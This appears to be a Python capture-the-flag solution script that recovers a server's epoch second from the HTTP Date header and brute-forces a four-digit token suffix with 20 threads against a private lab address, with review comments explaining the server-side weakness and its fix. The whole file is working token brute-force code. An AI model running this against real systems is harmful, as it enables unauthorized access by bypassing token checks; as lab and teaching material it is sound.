try:
# pip install requests rich
import requests
from rich.console import Console
from rich.progress import Progress, SpinnerColumn, TimeElapsedColumn
from rich.traceback import install
from rich import inspect
from rich import print
except ImportError as e:
print(e, "- Is it installed?")
exit(1)
# -------------------------
from datetime import datetime, timezone
from concurrent.futures import ThreadPoolExecutor as Executor
MAX_WORKERS = 20  # Less aggressive but still fast enough (thread pool size used in main())
# Install rich's traceback handler for the whole script.
# NOTE(review): show_locals=True renders every local variable into the
# traceback on an unhandled exception — here that includes the requests
# Session (with any cookies the target set) and the token strings in scope.
# Acceptable for a throwaway lab run, but it will leak session material into
# terminal logs / CI output if this is ever reused; verify before reusing.
install(show_locals=True)
# Shared console: main() logs through it and hands it to the Progress bar.
console = Console()
def main() -> None:
    """Run the token brute-force against the hard-coded lab target.

    Flow: open a session with a dummy token, read the server's ``Date``
    header to recover its epoch second, then try every candidate token of
    the form ``f"{server_timestamp}{guess}"`` for guess in 1000..9999 on a
    thread pool, logging the first response whose body does not contain
    "Malicious".

    NOTE(review): the server-side weakness this exercises appears to be a
    token derived from the request time plus a four-digit suffix, which
    leaves only 9000 candidates once the ``Date`` header reveals the second.
    The fix belongs on the server, not here: issue tokens from a CSPRNG with
    real entropy, bind them to the session, and rate-limit or lock out
    repeated failed token checks. Roughly 9000 failed checks from a single
    session within seconds is also an easy detection signal. (Server code is
    not visible here — confirm against the actual implementation.)

    Side effects: network requests to ``entrypoint``, console output only.
    Raises: ``KeyError`` if the response carries no ``Date`` header;
    ``ValueError`` if that header does not match the expected RFC 1123 form.
    """
    client = requests.Session()
    # Presumably a private lab address (RFC 1918 range); nothing on this page
    # says otherwise.
    entrypoint = "http://10.0.160.47"
    # Since the site uses `session_start`, we need to
    # hold our session in order to exploit the vulnerability
    # (a Session object keeps the cookie jar across all later requests).
    initial_response = client.get(entrypoint, params={"token": "DUMMY"})
    # NOTE(review): rich's inspect() dumps the whole Response object, headers
    # and cookies included, to the terminal — fine for a lab, noisy elsewhere.
    inspect(initial_response)
    print("[yellow](i)[/] Launching exploit...")
    # The server uses the time() value to generate the token so we
    # need to extract that value to bypass token verification
    date_value = initial_response.headers["Date"]
    # HTTP Date headers are RFC 1123, e.g. "Mon, 07 Oct 2024 21:11:00 GMT";
    # %Z accepts the literal "GMT".
    date_obj = datetime.strptime(date_value, "%a, %d %b %Y %H:%M:%S %Z")
    # Convert the datetime object to UTC timezone
    # (strptime yields a naive object; replace() just attaches UTC without
    # shifting the wall-clock value, which is what we want for a GMT header).
    date_obj = date_obj.replace(tzinfo=timezone.utc)
    # Get the timestamp in seconds since the epoch
    server_timestamp = int(date_obj.timestamp())
    print(f"{date_value = }\n -> {date_obj = }\n -> {server_timestamp = }")
    # Shared stop flag for the worker threads; see the note on the closure.
    already_found = False
    with Progress(
        SpinnerColumn(),
        *Progress.get_default_columns(),
        TimeElapsedColumn(),
        console=console,
    ) as progress:
        # total=None gives an indeterminate bar until we mark it done below.
        timer = progress.add_task(
            "[yellow] Processing...", total=None, complete_style="green"
        )
        # We define how we are going to process possible tokens
        def send_token_attempt(guess: int) -> None:
            """Try one candidate token; log the body if it is not rejected.

            Runs on a worker thread. Reads/writes `already_found` without a
            lock: with a plain bool that only means a few in-flight attempts
            may still be sent after a hit, which is harmless here.
            """
            nonlocal already_found
            if already_found:
                return
            possible_token = f"{server_timestamp}{guess}"
            console.log(f"[yellow](i)[/] Trying with token: '{possible_token}'...")
            response = client.get(entrypoint, params={"token": possible_token})
            # inspect(response)
            # Rejection is detected by the literal "Malicious" in the body;
            # anything else is treated as the flag.
            if "Malicious" not in response.text:
                console.log(f"[green](✓)[/] Here's your flag: [cyan]{response.text}[/]")
                already_found = True
                return
        # We need to check 9000 possible values (1000..9999) to get our flag.
        # Since we don't have all day, i'll use some concurrency
        # to speed up the process a bit
        with Executor(max_workers=MAX_WORKERS) as executor:
            # Iterating the map() result drains it so that any exception
            # raised in a worker is re-raised here instead of being lost.
            for future in executor.map(send_token_attempt, range(1000, 9999 + 1)):
                # Do nothing here...
                pass
        # Flip the indeterminate bar to a finished 100/100 state.
        progress.update(timer, description="[green]Completed!", total=100)
        progress.update(timer, advance=100)
# Script entry point: only run when executed directly, not when imported.
if __name__ == "__main__":
    main()